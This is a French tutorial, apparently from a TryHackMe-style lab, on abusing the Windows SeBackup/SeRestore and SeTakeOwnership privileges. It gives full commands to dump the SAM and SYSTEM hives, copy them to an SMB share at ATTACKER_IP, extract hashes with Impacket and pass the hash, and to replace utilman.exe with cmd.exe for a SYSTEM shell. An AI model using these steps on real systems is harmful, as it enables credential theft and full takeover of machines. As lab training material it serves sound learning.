🆙Privilège

Dans ce tutoriel, nous explorerons trois failles de privilèges Windows spécifiques : SeTakeOwnership, SeBackup/SeRestore, et SeImpersonate/SeAssignPrimaryToken.

SeTakeOwnership : Le privilège SeTakeOwnership autorise un utilisateur à s'approprier n'importe quel objet du système, y compris des fichiers et des clés de registre. En d'autres termes, il permet à l'utilisateur de prendre le contrôle total de certains éléments, ouvrant ainsi la voie à des attaques de privilege escalation. Nous allons examiner comment cette faille peut être exploitée pour élever les privilèges et effectuer des actions normalement restreintes.

SeBackup/SeRestore : Les privilèges SeBackup et SeRestore accordent à un utilisateur la capacité de lire et d'écrire dans n'importe quel fichier du système, contournant ainsi les contrôles d'accès habituels. Initialement conçus pour permettre aux utilisateurs de réaliser des sauvegardes, ces privilèges peuvent être exploités de manière malveillante pour élever les privilèges et compromettre le système. Nous explorerons comment ces failles peuvent être utilisées pour atteindre des niveaux d'autorisation plus élevés.

Pour une liste complète des privilèges exploitables, référez-vous au projet Priv2Admin sur GitHub.

🔒 SeBackup / SeRestore

Les privilèges Windows sont des droits qui permettent à un compte d'effectuer des tâches spécifiques liées au système. Dans ce tutoriel, nous nous concentrerons sur les privilèges SeBackup et SeRestore, qui offrent la possibilité de lire et d'écrire dans n'importe quel fichier du système, contournant ainsi les contrôles d'accès basés sur DACL.

Étape 1 : Vérification des privilèges

Commencez par vérifier les privilèges actuels en ouvrant une invite de commande en tant qu'administrateur et en utilisant la commande suivante :

whoami /priv

Assurez-vous que les privilèges SeBackupPrivilege et SeRestorePrivilege sont activés.

Étape 2 : Sauvegarde des ruches de registre

Utilisez les privilèges SeBackup pour sauvegarder les ruches de registre SYSTEM et SAM.

reg save hklm\\system C:\\Users\\THMBackup\\system.hive
reg save hklm\\sam C:\\Users\\THMBackup\\sam.hive

Étape 3 : Transfert des fichiers vers l'attaquant

Copiez les fichiers vers la machine de l'attaquant. Vous pouvez utiliser SMB pour cela. Créez un partage SMB sur votre machine avec Impacket :

python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

Copiez les fichiers vers la machine de l'attaquant avec la commande copy :

copy C:\\Users\\THMBackup\\sam.hive \\\\ATTACKER_IP\\public\\
copy C:\\Users\\THMBackup\\system.hive \\\\ATTACKER_IP\\public\\

Étape 4 : Extraction des hachages de mots de passe

Utilisez Impacket sur la machine de l'attaquant pour extraire les hachages de mots de passe :

python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

Étape 5 : Attaque Pass-the-Hash

Utilisez le hachage de l'administrateur pour effectuer une attaque Pass-the-Hash et accéder à la machine cible avec les privilèges SYSTEM :

python3.9 /opt/impacket/examples/psexec.py -hashes <HASH> administrator@TARGET_IP

Cela vous donnera un accès avec les privilèges SYSTEM sur la machine cible. Assurez-vous de suivre les meilleures pratiques de sécurité et de mettre à jour les systèmes pour atténuer ces risques potentiels.

🔒 SeTakeOwnership

Les privilèges Windows jouent un rôle crucial dans la sécurité du système, et dans ce tutoriel, nous explorerons le privilège SeTakeOwnership. Ce privilège permet à un utilisateur de prendre possession de n'importe quel objet du système, offrant ainsi une opportunité d'exploitation des privilèges. Nous aborderons cela en remplaçant utilman.exe pour élever les privilèges.

Étape 1 : Obtenir le privilège SeTakeOwnership

Ouvrez une invite de commande en tant qu'administrateur pour obtenir le privilège SeTakeOwnership. Utilisez la commande suivante :

whoami /priv

Assurez-vous que le privilège SeTakeOwnershipPrivilege est activé.

Étape 3 : Abuser de utilman.exe

Utilisons utilman.exe pour augmenter nos privilèges. Habituellement utilisé pour fournir des options d'accessibilité pendant l'écran de verrouillage, utilman.exe s'exécute avec les privilèges SYSTEM.

Étape 4 : Prendre possession de utilman.exe

Prenez possession de utilman.exe avec la commande :

takeown /f C:\\Windows\\System32\\Utilman.exe

Assurez-vous d'être propriétaire du fichier.

Étape 5 : Attribuer des autorisations

Attribuez toutes les autorisations à votre utilisateur avec la commande icacls :

icacls C:\\Windows\\System32\\Utilman.exe /grant THMTakeOwnership:F

Étape 6 : Remplacer utilman.exe

Remplacez utilman.exe par une copie de cmd.exe avec la commande :

copy C:\\Windows\\System32\\cmd.exe C:\\Windows\\System32\\Utilman.exe

Étape 7 : Déclencher utilman.exe

Verrouillez l'écran depuis le bouton de démarrage, puis cliquez sur "Facilité d'accès". Cela exécutera notre cmd.exe (anciennement utilman.exe) avec les privilèges SYSTEM.

Vous avez maintenant une invite de commande avec des privilèges SYSTEM, vous permettant d'effectuer des actions privilégiées sur la machine cible. Assurez-vous d'utiliser ces techniques de manière responsable et respectez les lois et réglementations applicables.